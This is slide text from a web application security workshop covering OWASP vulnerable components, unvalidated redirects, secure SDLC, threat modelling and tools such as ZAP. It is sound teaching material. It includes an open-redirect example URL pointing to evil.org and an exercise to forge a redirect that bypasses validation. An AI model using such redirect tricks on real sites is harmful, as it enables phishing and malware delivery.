How Heartbleed works (III)


Using Known Vulnerable Components

Libraries often contain vulnerabilitiesAttacker identifies a weak component

through scanningor manual analysis

Customized exploits used to execute attackFull range of weaknesses is possible

injection, broken access control, XSS, etc.Impact could be minimal, up to complete host takeover and data compromise

Source: https://www.owasp.org/index.php/Top_10_2013-A9

Prominent Library Vulnerabilities

Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-Libraries.pdf

SpEL Injection

Authentication Bypass

Remote Code Execution

Exercise


Task: Inform the shop about a vulnerable library they are using

Use the 'Contact Us' page and supplythe exact library namethe exact version

within your comment.


Protection

Identify the components and their versions you are using, including all dependenciesMonitor the security of these components in public databases, project mailing lists, and security mailing lists, and keep them up-to-dateRestrict the use of unapproved components

Source: https://www.owasp.org/index.php/Top_10_2013-A9

A10: Unvalidated Redirects and Forwards

Attack Vector

Average

Prevalence

Uncommon

Detectability

Easy

Impact

Moderate

Unvalidated Redirects and Forwards

Web application redirects are very commonAnd frequently include user supplied parameters in the destination URLIf they aren’t validated, attacker can send victim to a site of their choice

Forwards are common tooThey internally send the request to a new page in the same applicationSometimes parameters define the target pageIf not validated, attacker may be able to use unvalidated forward to bypass authentication or authorization checks

Typical ImpactRedirect victim to phishing or malware siteAttacker’s request is forwarded past security checks, allowing unauthorized function or data accessSource: http://owasptop10.googlecode.com/files/OWASP_Top_10_-_2010%20Presentation.pptx

Unvalidated Redirect Explained

bank.com

WebAppBrowser

Bug!

evil.org


Victim Request

HTTP/1.1 302 FoundLocation: http://www.evil.org

Redirect R

esponse

Request to Redirect URL

https://bank.com/account?...&...&...&dest=www.evil.org&...&...&...&...

URL

Exercise


Task: Find a place where a redirect is doneForge a link redirecting to http://kimminich.de

Do not let any validations stop you!


http://kimminich.de/

Protection

Avoid using redirects and forwards as much as you canDon’t involve user parameters in defining the target URLIf you ‘must’ involve user parameters, then either

Use server side mapping to translate choice provided to user with actual target page Validate each parameter to ensure its valid and authorized for the current user

Use a secure Redirect APIe.g. ESAPI SecurityWrapperResponse.sendRedirect(URL)

Some thoughts about protecting ForwardsCall the access controller to make sure the user is authorized before you perform the forwardNext best is to make sure that users who can access the original page are authorized to access the target page


Secure SDLC


Secure Software Development Lifecycle I

Analysis / Functional DesignIdentify (better: Reject) potentially insecure requirements

Technical DesignConsider Security Aspects when designing a solutionCreate a Threat Model of your Applications

Secure Software Development Lifecycle II

Development / RealizationKnow and understand common vulnerabilitiesKnow preventive measures for each vulnerabilityWrite Clean Code (=less likely to contain a flaw)

Write Unit Tests (=less likely to miss an existing flaw)

Perform Security Scans on source code levelPerform Code Reviews

Most importantly…Never blindly trust any user input!

Secure Software Development Lifecycle III

TestPerform Penetration Tests for new functionalityHave a 3rd party perform regular PentestsSupport Pentests with Security Scanners

Operations / MaintenanceInstall a Web Application FirewallEstablish an Incident Response Process

OWASP Open SAMM

Open Software Assurance Maturity Model

Open Software Assurance Maturity Model

Maturity Levels for each Security Practice0 = Unfulfilled activities1 = Initial understanding and ad hoc provision2 = Increased efficiency/effectvieness3 = Comprehensive mastery

Source: www.opensamm.org/downloads/SAMM-1.0.pdf

Security Practice Description & Assessment (Example)

Source: www.opensamm.org/downloads/SAMM-1.0.pdf

Open SAMM Online Self-Test

https://ssa.asteriskinfosec.com.au/




Threat Modelling

Bringing Security into Software Design

Threat Modelling (by Microsoft)

Repeatable Process to find all and address all threats to you application

Allows you to predicably and effectively find security problems early in the development processHelp to produce software that is secure by design

Source: http://download.microsoft.com/download/9/3/5/935520EC-D9E2-413E-BEA7-0B865A79B18C/Introduction_to_Threat_Modeling.ppsx

Diagram

Identify Threats

Mitigate

Validate

Diagramming

Go to the White BoardUse Data Flow Diagrams

Include Processes, Data Stores, Data FlowsInclude Trust Boundaries

= Points/Surfaces where an attacker can interject

Diagram LevelsHigh Level ScenarioLow Level SubcomponentsMore Details if needed


Diagram

Identify Threats

Mitigate

Validate

Diagram Elements I

External EntityThe external entity shape is used to represent any entity outside the application that interacts with the application via an entry point.

ProcessThe process shape represents a task that handles data within the application. The task may process the data or perform an action based on the data.

Source: https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf

Diagram Elements II

Multiple ProcessThe multiple process shape is used to present a collection of subprocesses. The multiple process can be broken down into its subprocesses in another DFD.

Data StoreThe data store shape is used to represent locations where data is stored. Data stores do not modify the data they only store data.


Diagram Elements III

Data FlowThe data flow shape represents data movement within the application. The direction of the data movement is represented by the arrow.

Privilege BoundaryThe privilege boundary shape is used to represent the change of privilege levels as the data flows through the application.


Example Diagram


Identifying Threats

Use STRIDE to step through the diagram elements

SpoofingTamperingRepudiationInformation DisclosureDenial of ServiceElevation of Privilege


Diagram

Identify Threats

Mitigate

Validate

STRIDE Threat List


Different Threats affect each Element Type


Mitigation

The Point of Threat Modelling

Address or alleviate ProblemsProtect CustomersDesign Secure Software

Addressing ThreatsRedesign to EliminateApply Standard MitigationsInvent new Mitigations (Avoid!)Access Vulnerability in Design


Diagram

Identify Threats

Mitigate

Validate

Validation

Validate whole Threat Model

Diagram matches final Code?At least STRIDE exists per Element that touches a Trust Boundary?Is each Threat mitigated?Are Mitigations done right?Source: http://download.microsoft.com/download/9/3/5/935520EC-D9E2-413E-BEA7-0B865A79B18C/Introduction_to_Threat_Modeling.ppsx

Diagram

Identify Threats

Mitigate

Validate

Security Libraries and Tools

(Do not expect a Silver Bullet here!)

OWASP ESAPI

Custom Enterprise Web Application

OWASP Enterprise Security API

Au

the

nti

cat

or

Use

r

Acces

sC

on

tro

ller

Access

Refe

ren

ceM

ap

Valid

ato

r

En

cod

er

HT

TP

Uti

liti

es

En

cry

pto

r

En

cry

pte

dP

rop

ert

ies

Ran

do

miz

er

Excep

tion

H

an

dlin

g

Log

ger

Intr

us

ion

De

tecto

r

Secu

rit

yC

on

fig

ura

tion

Your Existing Enterprise Services or Libraries

Apache Shiro

Powerful and easy-to-use Java security framework that performs

authenticationauthorizationcryptographysession management

Network Security = Useless?!

ServerNetwork Security

Firewall IDS IPS WebApp

Malicious Requestsexploit vulnerabilities

andcompromise application

Security Scanners



BlackboxScannerPenetration Test

WhiteboxScanner

Web AppSourcecode

CodeAnalysis

Fix + PatchApplication

New security holes mightbe introduced duringongoing developmentand bugfixing!

Vulnerabilities mightbe insufficiently fixed

Web Application Firewall (WAF)



WAF

GuidelinesRuleset

WhitelistBlacklist

Heuristics

Defines legal/illegal Requests

Rejects illegalrequests

Sometimes rejects legitimate requests („False Positives“) or fails to recognizeillegal requests („False Negative“)

Information Security Incident Response Process

Event

Detection

Reporting

InformationCollection

FirstAssessment

Relevant?

SecondAssessment

Relevant?

False Positive

Incidentunder

control?

Fore

nsic A

naly

sis

Com

munica

tions

Late

rR

esp

onse

Activate CrisisTeam

Crisis A

ctivitie

s

Imm

edia

te R

esp

onse

Review

Improve

DetectionReporting

User/Source

Yes

No

AssessmentDescision

OperationsSupport

No

Yes

No

Yes

Response

Information SecurityIncident Response Team

Crisis Organization

No

Yes


An Open Source Blackbox Security Scanner

Zed Attack Proxy (ZAP)

An easy to use webapp pentest toolCompletely free and open sourceAn OWASP flagship projectIdeal for beginners……but also used by professionalsIdeal for automated security testsBecoming a framework for advanced testing

Source: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

Principles

No paid for „Pro“ versionInvolvement actively encouragedCross platform (Java)Easy to useEasy to installFully documentedWork well with other toolsReuse well regarded components


Statistics

First released September 2010Current version 2.3.1

released in May 2014downloaded 70.000+ times

Translated into 20+ languagesIntended for Developers……mostly used by Professional Pentesters


Features

Intercepting ProxyActive and Passive ScannersSpiders (for HTML and AJAX)

Report GenerationBrute Force (using OWASP DirBuster code)

Fuzzing (using fuzzdb & OWASP JBroFuzz)

WebSocket SupportSession AwarenessIntegrated Addon-MarketplaceAPI (clients exist for Java, Python, Node.js, PHP)

Scripting (JS, Jython, JRuby, Zest)Source: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project

Usage Scenarios


Quiz & Wrap-Up

Quiz

A1: Injection

A3: Cross-Site Scripting

(XSS)

A2: Broken Authentication

and Session Management

A4: Insecure Direct Object References

A8: Cross Site Request Forgery (CSRF)

A5: Security Misconfigur

ation

A6: Sensitive Data

Exposure


A9: Using Known

Vulnerable Components

A10: Unvalidated

Redirects and Forwards

Ex-A6/2007: Information Leakage and

Improper Error Handling

Recommended Books

Security Live CDs/DVDs

Kali Linux (fka Backtrack)Samurai Web Testing FrameworkOWASP Broken Web Apps VM

Useful OWASP Links

OWASP Website http://owasp.org

Appsec Tutorial Series http://www.youtube.com/user/AppsecTutorialSeries

ZAP http://code.google.com/p/zaproxy

Java HTML Sanitizer https://code.google.com/p/owasp-java-html-sanitizer/

Enterprise Security API http://code.google.com/p/owasp-esapi-java/

OpenSAMM http://www.opensamm.org/

Broken Web Applications https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

Vulnerable Web Applications Directory https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project

http://owasp.org/

http://www.youtube.com/user/AppsecTutorialSeries

http://code.google.com/p/zaproxy

https://code.google.com/p/owasp-java-html-sanitizer/

http://code.google.com/p/owasp-esapi-java/

http://www.opensamm.org/

https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project

https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project

https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project

End of Day Two

Participant Feedback

Follow the Doodle link in your invitation email

Please provide at least a star-ratingAdditional feedback is highly appreciated

What did you like best about the workshop?What could have been better?What didn‘t you like at all?

End of Workshop

Thank you for your attention!

The Background Artwork: Shodan

The background artwork shows the self-image of villain AI Shodan from the cyberpunk-RPG video games System Shock and System Shock 2

©1994/1999 Looking Glass Studios/Irrational Games

Background image based on „Digital Shodan“ created by sephiroth-kmfdm

Source: http://sephiroth-kmfdm.deviantart.com/art/Digital-Shodan-56013493

Recolorized using Corel PSP X5, Paint.Net and IrfanView

http://en.wikipedia.org/wiki/SHODAN

http://en.wikipedia.org/wiki/System_Shock

http://en.wikipedia.org/wiki/System_Shock_2

http://sephiroth-kmfdm.deviantart.com/

http://sephiroth-kmfdm.deviantart.com/art/Digital-Shodan-56013493

http://sephiroth-kmfdm.deviantart.com/art/Digital-Shodan-56013493

web application security

Technology